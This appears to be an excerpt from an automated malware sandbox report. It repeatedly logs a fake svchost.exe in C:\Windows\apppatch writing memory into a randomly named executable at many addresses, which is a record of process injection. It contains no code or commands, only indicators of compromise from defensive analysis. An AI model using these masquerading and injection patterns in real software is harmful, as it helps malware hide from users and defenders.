Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 14C0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 14C1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 14C2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1512000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2920000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2921000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2922000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2972000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2790000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2791000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2792000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 27E2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2650000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2651000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2652000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 26A2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 5E0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 5E1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 5E2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 632000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2B90000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2B91000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2B92000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2BE2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2D10000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2D11000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2D12000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2D62000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2790000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2791000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2792000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 27E2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BD0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BD1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: BD2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: C22000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2200000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2201000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2202000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2252000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2470000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2471000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2472000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 24C2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 13D0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 13D1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 13D2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1422000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2860000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2861000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2862000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 28B2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2CA0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2CA1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2CA2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2CF2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2470000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2471000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2472000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 24C2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1560000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1561000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 1562000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 15B2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: E50000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: E51000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: E52000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: EA2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: AD0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: AD1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: AD2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: B22000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2230000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2231000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2232000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2282000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2150000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2151000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2152000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 21A2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2F30000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2F31000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2F32000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2F82000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 9F0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 9F1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 9F2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: A42000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2F20000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2F21000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2F22000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2F72000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 15A0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 15A1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 15A2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 15F2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 26D0000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 26D1000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 26D2000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: 2722000	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory written: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe base: DF0000	Jump to behavior
